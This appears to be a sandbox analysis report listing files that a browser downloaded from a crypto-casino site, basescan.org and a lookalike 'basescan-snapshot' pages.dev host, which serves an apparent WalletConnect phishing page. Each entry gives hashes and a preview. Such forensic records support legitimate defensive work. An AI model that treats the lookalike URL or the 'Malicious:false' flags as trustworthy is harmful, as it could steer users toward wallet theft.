                                                                                                                                                                                                                                              SHA-512:DC15C77CA74E32FCCE06ABFF67BDCCB8F84DB8718CC2CAE4EEB83598FC027F7239E03EE0AD1136B2870F84921C36A750C12AD8AC42AB9085D479C31BBB72D143
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/favicon.ico
                                                                                                                                                                                                                                              Preview:......00.... ..%......(...0...`..... ......$.................. .. .. .. .. .... . ..!!.J .. ..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!.. .. ..!!.D ...... .. .. .. .. .. .. .. ...... .. .A ..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!.. .. .E ...... .. .. .. .. ...... ..!!.t!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..! .. ... ... ... ... ...! ..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!.t ...... .. .. ...... .. ..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!.. .. ...$'..)1..-8..-: .,6 .)1 .$'.. .. ..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!.. .. ...... ..!!.. ..!!.t!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!.. ...! ..&+..1@..Ce .X.#.e.&.g.).`.+.U.+.Bd'..=".%* .!!.. ..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (28280)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):28357
                                                                                                                                                                                                                                              Entropy (8bit):5.0624134780915675
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:bPEZHV4Vr1nDrFOXukj28r8HxLddsHHSeRwKZUsaPehMhvVgzCOPPUTvbRRViHdu:4ZuD8XukjRxNJevVgzCwUTNRM8DWM
                                                                                                                                                                                                                                              MD5:3DA9D866DAB0F5D7E264603CD909BF1B
                                                                                                                                                                                                                                              SHA1:41A2E068CCB7CDB9453A6D8BA451F32C2294D788
                                                                                                                                                                                                                                              SHA-256:23FC326908579CA62483339B5C66B4F1E1FE6EFDF2AE0D26EB16BB9ED0036E7F
                                                                                                                                                                                                                                              SHA-512:B7F4307A240DCF2A697BC0DD2947F76F2F898F4178BE11B701631894C76488F4C346D9C095B8D01D466D72B7FEF75969401F5F96DC9F3DB2447F355039381A37
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const e="AML",t="APP",o="Accept",n="Achievement",a="Active",i="Activities",r="Affiliate",s="All",l="Baseball",c="Basketball",u="Bingo",d="Blackjack",p="Blog",m="Bonus",_="CASINO",h="Cancel",y="Cash",g="Casino",w="Chat",f="Club",b="Completed",S="Confirm",k="Copyright",T="Cricket",C="Cryptocurrency",v="Daily",A="Dark",B="Deposit",E="Details",N="Explore",H="FAQ",P="FIFA",L="Fairness",R="Favorites",O="Forum",V="Futures",D="Game",F="Handball",M="Hidden",G="Hide",x="Highlights",W="History",I="Hour",U="Hours",z="Jackpot",Y="Keno",J="LCFC",K="League",$="Legal",j="License",q="Light",Q="Live",X="Lobby",Z="Lottery",ee="Matches",te="Menu",oe="Minute",ne="Minutes",ae="Monthly",ie="Multiplier",re="New",se="Newest",le="News",ce="Next",ue="Notification",de="Past",pe="Player",me="Popular",_e="Post",he="Prize",ye="Profit",ge="Promo",we="Promotions",fe="Providers",be="Racing",Se="Recent",ke="Recommend",Te="Recommended",Ce="Refer",ve="Result",Ae="Results",Be="Rounds",Ee="Rules",Ne="SPORTS",He="Search",Pe=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1077)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1078
                                                                                                                                                                                                                                              Entropy (8bit):4.833033466376096
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:w0WRXW/AbI/zWWu+/WQSpV+RGDl1jeu7XYwYUG8iRHp8LkrM:wvRzs/6WPLSpQ8njJY1P8idWwg
                                                                                                                                                                                                                                              MD5:8D31831330824073717CB4EED2199917
                                                                                                                                                                                                                                              SHA1:9B89C6037ACE8B48753FA11CA400ACAD066C9C5D
                                                                                                                                                                                                                                              SHA-256:0237CB64E3A077C175C84102E2EE1EF4B4854BBE7B77B151B7628E7F9B9639E5
                                                                                                                                                                                                                                              SHA-512:687F126E421B910E1620FE0AEBF387DCC489C78D205E368D2C86976DBB7FC5FF32B020D6529CDB905EAF2C0D4B6D388AC04AB3BAAA262347FF97AF7DF666273C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const e=globalThis._bc,{Aliases:s,Assets:t,ChildProperties:r,DOMElements:a,DelegatedEvents:n,Dynamic:i,ErrorBoundary:o,For:d,Hydration:l,HydrationScript:c,Index:g,Match:y,NoHydration:p,Portal:S,Properties:m,RequestContext:u,SVGElements:E,SVGNamespace:v,Show:A,Suspense:h,SuspenseList:H,Switch:N,addEventListener:b,assign:P,classList:x,className:D,clearDelegatedEvents:L,createComponent:M,delegateEvents:T,dynamicProperty:f,effect:C,escape:w,generateHydrationScript:R,getAssets:k,getHydrationKey:q,getNextElement:G,getNextMarker:K,getNextMatch:O,getOwner:V,getPropAlias:_,getRequestEvent:B,hydrate:F,innerHTML:I,insert:j,isDev:z,isServer:J,memo:Q,mergeProps:U,render:W,renderToStream:X,renderToString:Y,renderToStringAsync:Z,resolveSSRNode:$,runHydrationEvents:ee,setAttribute:se,setAttributeNS:te,setProperty:re,spread:ae,ssr:ne,ssrAttribute:ie,ssrClassList:oe,ssrElement:de,ssrHydrationKey:le,ssrSpread:ce,ssrStyle:ge,style:ye,template:pe,untrack:Se,use:me,useAssets:ue}=e.h0lnfr;export{b as a,D as
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1604
                                                                                                                                                                                                                                              Entropy (8bit):7.8664120620706415
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:M65SxH9PWR1AtJi64LVWE3mSg6X0tgK4N2NRfuFBjBZNyejmyetaUtBApgtFLekx:MVg/UaWEdNktrIJIwmLtBApg3Rx
                                                                                                                                                                                                                                              MD5:A132EE48754117807A0DB4C4E92906A5
                                                                                                                                                                                                                                              SHA1:A38D5719E86D47D9D5A76C039FB1838C4A696217
                                                                                                                                                                                                                                              SHA-256:0BB4718B68D3E2DF1863EE7950EE7322DEF2041FC16AD38D51ED43600B527A82
                                                                                                                                                                                                                                              SHA-512:9DA368D273884224DF0ABC7AFC8C4E5DB034CD7944E696B304099A7A0DEA66205237FAFF158DDA193E27B04DCBC66FB7B3CECA2B7E3599CE68D47B900068CBBD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/coin/BNB.black.png
                                                                                                                                                                                                                                              Preview:RIFF<...WEBPVP8L/.../c.....0.dUi\...a.<..m.....o..q#I..='..^.a.u$.J.8.S.J....pw.#$H..o...A.l.... .(.`!.....?.$....bXk5....?_`....G7..-@61..>.Y..Q;X~.F....u.z3.Fo:..A.*..*....6z"R0.M5.P./..]..yn..F....xl6k.|..V.1.f.O....T..=.~..o.8\..k}.^O..k..IR..m.....6..5...k.^Dv...7...K..m...{..-.T^.cL..>lk..,*.Y.....sN...G-E.$..G.;./..sY.!..O...l.....5.`%.^4.A.D..Kk~.ay..8..scP.c.<..$. OJ...A.'...Qy.&...wFxS.M$\;o.......(%.(K.5.w.+....9(K.;&..x.>?D2d..T...c.1..7..{n...Z.o...G.... A....y..#..=.....~........L..=....TH>.,......Q...qj...<.K..!.....s8.....b._<.O..P.,\K...O...-^@4+.c}#..NP.cJW...<..v1...o3..d.Rr)W/Q..#..E...>.2<...DPy..t.(.#.^..*U...r........r..E?}.D.Qr..U.I.!%*.F;..b..^#x.}"../.V.."...t..+....t...u...u..t....G.....M....tF.Q.o..h....$..?..Zr|a.K..I.Q.....C...8..Z.!-7.b.'8.C......5..F<. ...kQ/...!..^h..4....(%..n.E.0.^.Q..a..E.).......H(.MXz2...(C.....#Is....foOf-......0.J.=..>E...e)....= .....Z.N.e...P....`..pM.j....]....0I......LEm...p
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):4038
                                                                                                                                                                                                                                              Entropy (8bit):5.24220398742376
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:a5fiuqPPpPhQo4kLLu7FeDrlIuesOAGu6FLn/w+1hov1jsUpT08ehNdUL+OuFWr:yiuqPPpPhQLkLy7FeDrlIuesOA36FL/W
                                                                                                                                                                                                                                              MD5:CD899D8FA526AB056A475CB2916BC127
                                                                                                                                                                                                                                              SHA1:26AA11936430C8D8E7F26F258F24CD23CEAF8470
                                                                                                                                                                                                                                              SHA-256:152381818CD0A78B6798BE3FF153D8DA8F879FFB44B49A5961E9FD5B5EE849A1
                                                                                                                                                                                                                                              SHA-512:CF33CAE28ED233FB63203A8F2F99FB765ADD7984F7C2679117778AC2BBEB3542D7673687B5036A1AB7896224260ECB4DFABE8A846CC911349664490EDA03D0FE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/images/svg/brands/metamask.svg
                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 22.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Layer_1" xmlns:ev="http://www.w3.org/2001/xml-events"... xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 318.6 318.6"... style="enable-background:new 0 0 318.6 318.6;" xml:space="preserve">..<style type="text/css">....st0{fill:#E2761B;stroke:#E2761B;stroke-linecap:round;stroke-linejoin:round;}....st1{fill:#E4761B;stroke:#E4761B;stroke-linecap:round;stroke-linejoin:round;}....st2{fill:#D7C1B3;stroke:#D7C1B3;stroke-linecap:round;stroke-linejoin:round;}....st3{fill:#233447;stroke:#233447;stroke-linecap:round;stroke-linejoin:round;}....st4{fill:#CD6116;stroke:#CD6116;stroke-linecap:round;stroke-linejoin:round;}....st5{fill:#E4751F;stroke:#E4751F;stroke-linecap:round;stroke-linejoin:round;}....st6{fill:#F6851B;stroke:#F6851B;stroke-linecap:round;stroke-linejoin:round;}....st7{
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65470)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1184878
                                                                                                                                                                                                                                              Entropy (8bit):5.668179527600575
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:O/QrM70NNb2ki3aT9lWCNvmsIAAvkNS98bKwTlC1wr5ndZYTXLpg3jvLJvyzzWaO:OIrM7xkr/WamsIbcvbKunDYn6vU8
                                                                                                                                                                                                                                              MD5:4E131238273584C83B0089668CF50B1C
                                                                                                                                                                                                                                              SHA1:A0E353E006C1CE398CC28B065C9E2754F9F6D655
                                                                                                                                                                                                                                              SHA-256:8CDCD2AA68C68480D5180CA0CD64F190C7064FDECFF596EA34042EBA5FF181DB
                                                                                                                                                                                                                                              SHA-512:1179354C1AD3D530BE6A372BF1CF8C71584616FE31008FBC9BE57B4F83F04F731D600BF8EE3922AE57934D987C205B51BFDD19B4A3CE93FE09253194690F5DE9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:/*! For license information please see web3.min.js.LICENSE.txt */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.Web3=t():e.Web3=t()}(self,(()=>(()=>{var e={1645:(e,t,r)=>{"use strict";var n=function(e){var t="function"==typeof Symbol&&Symbol.iterator,r=t&&e[t],n=0;if(r)return r.call(e);if(e&&"number"==typeof e.length)return{next:function(){return e&&n>=e.length&&(e=void 0),{value:e&&e[n++],done:!e}}};throw new TypeError(t?"Object is not iterable.":"Symbol.iterator is not defined.")},i=function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0}),t.chains=t._getInitializedChains=void 0;var o=i(r(7295)),a=i(r(1227)),s=i(r(439)),u=i(r(7098)),c=i(r(7687));function f(e){var t,r,i={1:"mainnet",3:"ropsten",4:"rinkeby",42:"kovan",5:"goerli"},f={mainnet:o.default,ropsten:a.default,rinkeby:s.default,kovan:u.default,goerli:c.default};if(e)t
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):7520
                                                                                                                                                                                                                                              Entropy (8bit):7.973823195340042
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:NdUVbhF5QKL3h1DlAe6kdxMIhJD+oIrFd:8qKL3h1Zhd7W7
                                                                                                                                                                                                                                              MD5:CEE6DE5CBF3EDFED814F33C7F29BAAF9
                                                                                                                                                                                                                                              SHA1:93F4AEEDEDC8EE7BD7752115F76E2AEDEABFC077
                                                                                                                                                                                                                                              SHA-256:86C3A452A037EFBA8C71C3488F3A6B4AAF028E23A43A75CA5DB2FE6CDC9297B3
                                                                                                                                                                                                                                              SHA-512:2D4ECC756D37CF9FBD12525DFABD90714DF681ACA65D95FEC0BDE0D4EF0225AFB7A14379E328468F039A6613DFB91F259555A9CA8988D0A10BA4C48693F95723
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/icon-g-DjQwb4.png
                                                                                                                                                                                                                                              Preview:RIFFX...WEBPVP8LL.../..e...*.m7Y...<........'t.nk.m..9'.....+x.2.Do.ml.....KF.P.}..).kv.... .m!..h.MhdEM`.L..+.[..n...................h...3h*z7....`u....4........../..]..K..SBJ....*.I ...p..,..!1%.....).v7.r....v`............~7..l...$.(.........K..D!7..-}_<.s..Ae..X..}Z..C.L..@....F..E. /u%X...o..I.E.N....v=.^yv._YGA.6L..... "....Q.R...:{..m[k.f.%...Ik.....^.$..y/GYy. GV..f..`".u..&...:...e[....\.p..(:...r.,...........f..,...dq4.e....;.l.n..@.u4!p%~.EW.f...:L..`....|.?.....(.MF..G....w IR.,..".....|.j.O>x..~x........w.}|..u~....W..t........._/..+Jy.U..|E_./S6.w{.....U#..X9...yI.eB...).T.t...^..Y.u..."......[.;.......q..:.q.......-MT..lw:..RS9.]I...y.\7..S*.....gK..~.......K.4.\&...y..F.noI.W.k..b.yXH.\)F.iZ..6..L}.n.<..4.$.l$_..S7.R.p.f7.....o....|.p.....a.<.a1.6.0.r.u....$..PR.TP.....a....../2./......d.b.....=I..&>......IC.....L<c.4.&...5..u>..J..*R.......H..~.-#.....v[.w.t..ee..)..m.*.+$.)6IM.H.K....H..y;.."....^w..n.|...(.gZ..h..I`.@F...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8282), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):8282
                                                                                                                                                                                                                                              Entropy (8bit):5.149624157945766
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:JzryobAWc5LQBtQ4DCvwmhZgDfJzK+MwF5et+isKfKfNF8FMwUYdHSi/Ag8Urit:drysG4mvwDXrzivmNC6wNxut
                                                                                                                                                                                                                                              MD5:0CA49A5CACBB1C5B3F36CE01EEEC98CC
                                                                                                                                                                                                                                              SHA1:33A5C493D9AAB0FB8271E5B7220EB07D8410D0E9
                                                                                                                                                                                                                                              SHA-256:AB0079AD7AE0E6DD08336DE74406B9903055C811953AF7A4DD60D759F1C47B14
                                                                                                                                                                                                                                              SHA-512:B2851307D2FA7B8A24E750E5EA7F8DA4A133522139C2121478D0F976652BDB703228E66DEE3D550A0B3C47AF8E3EA4348B9FF61EDDF5F95684A30090D26A1DC0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/jquery-migrate/dist/jquery-migrate.min.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:void 0===jQuery.migrateMute&&(jQuery.migrateMute=!0),function(e){"function"==typeof define&&define.amd?define(["jquery"],window,e):"object"==typeof module&&module.exports?module.exports=e(require("jquery"),window):e(jQuery,window)}(function(e,t){"use strict";function r(r){var n=t.console;o[r]||(o[r]=!0,e.migrateWarnings.push(r),n&&n.warn&&!e.migrateMute&&(n.warn("JQMIGRATE: "+r),e.migrateTrace&&n.trace&&n.trace()))}function n(e,t,n,a){Object.defineProperty(e,t,{configurable:!0,enumerable:!0,get:function(){return r(a),n},set:function(e){r(a),n=e}})}function a(e,t,n,a){e[t]=function(){return r(a),n.apply(this,arguments)}}e.migrateVersion="3.0.1",t.console&&t.console.log&&(e&&!/^[12]\./.test(e.fn.jquery)||t.console.log("JQMIGRATE: jQuery 3.0.0+ REQUIRED"),e.migrateWarnings&&t.console.log("JQMIGRATE: Migrate plugin loaded multiple times"));var o={};e.migrateWarnings=[],void 0===e.migrateTrace&&(e.migrateTrace=!0),e.migrateReset=function(){o={},e.migrateWarnings.length=0},"BackCompat"===t.d
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22990
                                                                                                                                                                                                                                              Entropy (8bit):7.981809340487849
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:LoBDD8Bx2N4fwrNwaM1FrW0r1XeyCB+wtqF4T14RAeJySYD9I+SkM0zIzUwinrs2:wDAiN4Yk1FrW0Iy2tqF4T1XeqD9N/IU1
                                                                                                                                                                                                                                              MD5:45F4FCC115F3BF90597705F7A27C1723
                                                                                                                                                                                                                                              SHA1:8A3C5BF5F5A0C3DAF23A7AF136D10D73E6914CC6
                                                                                                                                                                                                                                              SHA-256:86065BC993917BBCC76A676FC107E51D6394D6F147301485E5FB9A6394A7C3D3
                                                                                                                                                                                                                                              SHA-512:AE3FD32390B76D2FAAED8FFE3AC3E34564F1448E583471C9AFF36CF33686310F377E527E3607E7ED3AEECDE2F20F97ABA7D0A6EEEEB10D266DF0EE09C308AEF9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...............^.....sRGB.........PLTE.............]..^.....]..^.............[943.....Z6,K*!.Y....%..&#+gC=!.'.[.+..W51/.._<2......`>9...~...W....S1+._.....1....7 ..."/%*d@7......x1..b..Q.y...`..3.N.%.l'$...].t5..m..7...0...D'..f$.1.r+&......V.?$.._.H,&...T1..C.6...X!.9.N+..?..O..V...........h.a2..3.Y.9)'.W./......S..O...-......a)....n..8.H..A..O...^+..x).7{Q.=!..I.m5..L..r..H..$.g4...{.3j/.Z3..7.c:.N.F'......;...xQ8.x9lE.....c..m=.T.d?..e..2sL&.......g.[9..nIp+.d@$....Z5._..lN..A,(V$..S.B...m.vS.\..o..^..?..=.<.u..=..auI.....v&..y.j!./....g(..d.8+1.{.i..>.{#.v..j...u_$.._...T.wA.Y.?.U3...E.M.mJ6.a.Q..K..<..B..X...o.x-....t.v..eN.......qX....d..D.m..[J.~T.G.Y.s@.{a.....d.~S.d=.i..}<H48.]..C.S!.+...l.s..L.....v.h..g*....H..k....W0.....9...e....ZO..{{.>..<,.cb...... .IDATx^...P.g....3O.&O.'..+...$.....0.y.......SI.i..f...5.&j...c.../.@)Uv.....7.v.....{~Z_.uG[u.n.{....'......h.B....u].u_........^z.9....[.n.u.7.....^~.O..^u
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 133, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4876
                                                                                                                                                                                                                                              Entropy (8bit):7.916400422385832
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:hO+Qipl4VpRcMdChU/rkq66i18H9Zpi+hZKSbo7NpjI8ihD8OYbkc:hO+NP4pqI4q6vUo+nfZIoc
                                                                                                                                                                                                                                              MD5:83F11143537D5D6B07EB2401AD2BFFE4
                                                                                                                                                                                                                                              SHA1:FEAC81F42F4902209E96114C580E45A985B5AAC1
                                                                                                                                                                                                                                              SHA-256:E2FC8BA00B72788590F4719D14AE168A95240FD4AFC3036A8F70465F226B66E5
                                                                                                                                                                                                                                              SHA-512:5478A767AAF7D72BFF512704D4DE2E8CF2FD4013C34A0B2B68C95FBD563DBFA0FDACA780D48E01F5F9E90C79DB40B47DFCA6C9DB385E77FA640F799B71FC16FA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d..........$.A....sRGB.........PLTEXWU..n[YWoifjfc..o..sb`^VURfc`^\[\ZZunh..p...........r...SQO.....n..s....y_]^..............................vm.....|rk.........zo.....o..u.....u.....,|.ds...........w.................t..u...................kt............|...........cbf..............t..tYo.............z..r..........Hd...xy........................pw....c......qz..^q.v....p`_b5Z...........hgkC`.....Ul.}..iw....=]....k}....Yq....s........w{...uP....uZ..Cv....Or......y...l....................q~.edk|~..........y..}...Nf.......u..Pk.G.....>.........................jiq........~..............8y.no{...........z.....5...............}...lluolm...]~....as...{..{tu.zw{...n.............rr|d|........yxrp....{x................O|.......l..]w.x........h|.rpt............il....D....IDAThC...\Ue...c...hD...C....\A..z.U ...N+.s.+Dd.+d.2...........4......k.H.Fsr4..~L..ej.....}..<.....x.|...s.j...O..^x..~...[.n....O<..s..9s..jp........K..c.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2190
                                                                                                                                                                                                                                              Entropy (8bit):7.900793119818925
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:xbnb+vMUqXTVVIZXBwvu8TOU7FMKb+oZk3D0myKK8k:VFUqDvIZXBb8TOU7vZk3DnZKp
                                                                                                                                                                                                                                              MD5:5E4BE14E0B57791F251C7A02B3FAC080
                                                                                                                                                                                                                                              SHA1:9ED0350FF636AA602E0DD13CA97CCB6B2C46A6E6
                                                                                                                                                                                                                                              SHA-256:3D108AB74B80126691AEAED1D53987B5C45B635B9278E20CAAF1690377BD1728
                                                                                                                                                                                                                                              SHA-512:97C93FBD7CB4D8C1DDAAEB4C572E1AE1ACD254EFC4223219CC90B0B904BB11DECB322CABFF66128800E1AFC4690335BC516CFCB486BB5317CA0F5350A13D7790
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/logo/logo.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8Ly.../....'. .$....ZQ....F.$I..........Y.m.F.;....A.IB..+....<.xG8$8...a`{.4......C..!..!.`h.?04.:..A.......G.J-...V.G.&..V..B..3......Lb...d...C...4A. .=M....g.=o.k..l.<S.N:<.V...=.}....;......G @..CDL..'m[{..73.qiaq133S.MJ....d.7.8WVD.!H......C......mU...$. .....4C......"..@....sBN...@z..L....h.E,I....M....cD2W.!....S..8..b.y..b..W.2.AL...G....,)....A... . .......b{q..j....@.R;.q...y^\..Vym....H..xEafn........~7...yd..yJ..&o....b]#.......R...W...C=3..tX.......;.B...Qt.9...%...|..X....h..........j.Q..E2.g.....mg.....u...\..X..DI)....[.2fY.....i..#^.O..Y..C...E...."...(.[Q}. ...5..!.R.....N...>l.......y..].*q/.0..."/....secsK.....[.....c...*.~..E..ML%!....14.!.....-..5...~R.-.v2.(....#..?.[F.....c.b..W0. ..2.g.f).v...s.Xa.t.DNn.<A,..W...Q...>....Ly..t.9_.....%..".G.^u...cS...m.e^).......`.P...F..].......9_.D..nE...G.5a._.#I...6..t....Y..w......\.&^...F.....7.D9...s.!$].A".!s*.}'.&...2.D..\.i..eY.&..V.!.5Cg.I.=.X...%..j..|p...M.lv.&.>
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/styles.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 400x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):5806
                                                                                                                                                                                                                                              Entropy (8bit):7.959082405424623
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:LpL9WgcSPsFU5WWmUfxlK97IFFImxvNG+ZbyfbQyo3BkLsd5X:LphW3USSfF/xvs+ZGfb2Y
                                                                                                                                                                                                                                              MD5:642979B6270BDD1654919F26F8B4BD3A
                                                                                                                                                                                                                                              SHA1:36A7B276EBF210EFD1B7EEDF74E44AB82609A75A
                                                                                                                                                                                                                                              SHA-256:AE5288E2522736D9905E4BE3C6F961A43EFDCCA4E15A4F2566E36505CE519165
                                                                                                                                                                                                                                              SHA-512:71745B18784892BB77F99C94A0B1DABD04D30704609CA4AF7634B8EA3E94647B49635DBA222B2B10777181C3D753764ED81903D4E9C71708663423388E83ED22
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://api.web3modal.com/public/getAssetImage/600a9a04-c1b9-42ca-6785-9b4b6ff85200
